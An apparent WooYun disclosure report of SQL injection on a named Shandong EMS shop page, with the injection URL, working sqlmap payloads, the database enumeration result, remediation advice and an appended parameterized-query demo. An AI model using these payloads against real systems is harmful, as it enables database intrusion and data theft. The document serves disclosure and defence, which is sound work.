
Shandong EMS: entire site's databases compromised (no idea how many thousands of tables)

2014-10-11 23:25

1. Injection point:

http://www.sdems.com.cn/shop/ordershop.asp?id=20104774444030&orderid=1 (GET)

2. Payload (sqlmap output)

sqlmap identified the following injection points with a total of 54 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=20104774444030%' AND 5635=5635 AND '%'='&orderid=1

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=20104774444030%' AND 5564=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(121)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (5564=5564) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(100)+CHAR(111)+CHAR(113))) AND '%'='&orderid=1

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: id=20104774444030%' AND 6250=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='&orderid=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005



3. Databases: group-buying, company OA, ERP, Haier ERP. Far too many sensitive databases.

available databases [23]:
[*] DianCMS
[*] EMS_ERPbate
[*] ems_OA
[*] EMSERP
[*] EMSERP_0106
[*] EMSERP_0501
[*] EMSERP_07161
[*] EMSERP_1223
[*] EMSERP_830
[*] EMSERP_910
[*] EMSERPNEAR
[*] emstuan
[*] HaierERP
[*] INGNET_TCG
[*] INGNETERP
[*] master
[*] model
[*] msdb
[*] tempdb
[*] TUAN39
[*] tuangou
[*] WJM
[*] WJM_EN

There are too many tables; enumerating them all would take far too long, so only a screenshot of one database is included as proof.

[Screenshot: QQ截图20140827170108.png]


Remediation:

First, SQL injection: filter the input (or better, bind it as a query parameter). Everyone knows this.

Second, if the databases of all the sites live on the same server, it is best to separate the web server from the database server so that the database stays protected; otherwise one small vulnerability turns into a big problem.
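The sqlmap payloads above (a leading `%'` and a trailing `'%'='`) imply that ordershop.asp concatenates the id parameter into a `LIKE '%...%'` literal. The Python below is an added example, not code from the report or from the site: it reproduces that query shape against an in-memory SQLite table standing in for the MSSQL back end, shows how the report's boolean-based payload flips the result set, and shows the bound-parameter version with LIKE metacharacters escaped, which is the concrete form of the "filter" advice. The table, rows and function names are constructed for the example.

```python
import sqlite3

def make_db():
    # Constructed sample data; SQLite stands in for the MSSQL 2005 back end.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE orders (id TEXT, customer TEXT)")
    con.executemany("INSERT INTO orders VALUES (?, ?)",
                    [("20104774444030", "alice"), ("20104774444031", "bob")])
    return con

def lookup_vulnerable(con, order_id):
    # String concatenation: a quote inside order_id closes the LIKE literal,
    # so the rest of the input becomes SQL (this is the shape sqlmap exploited).
    sql = "SELECT customer FROM orders WHERE id LIKE '%" + order_id + "%'"
    return [row[0] for row in con.execute(sql)]

def lookup_parameterized(con, order_id):
    # Hardened form: the value is bound, never parsed as SQL, and LIKE
    # wildcards in user input are escaped so they match only literally.
    escaped = (order_id.replace("\\", "\\\\")
                       .replace("%", "\\%")
                       .replace("_", "\\_"))
    sql = "SELECT customer FROM orders WHERE id LIKE ? ESCAPE '\\'"
    return [row[0] for row in con.execute(sql, ("%" + escaped + "%",))]

# The report's boolean-based payload, and a false-condition variant of it.
TRUE_PAYLOAD = "20104774444030%' AND 5635=5635 AND '%'='"
FALSE_PAYLOAD = "20104774444030%' AND 5635=5636 AND '%'='"

if __name__ == "__main__":
    con = make_db()
    print("vulnerable, true condition :", lookup_vulnerable(con, TRUE_PAYLOAD))
    print("vulnerable, false condition:", lookup_vulnerable(con, FALSE_PAYLOAD))
    print("parameterized, same input  :", lookup_parameterized(con, TRUE_PAYLOAD))
```

The vulnerable lookup returns the row for the true condition and nothing for the false one, which is exactly the oracle a boolean-based blind injection needs; the parameterized lookup treats the whole string as an order id and matches nothing.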

Source: www.wooyun.org/bugs/wooyun-2014-074081
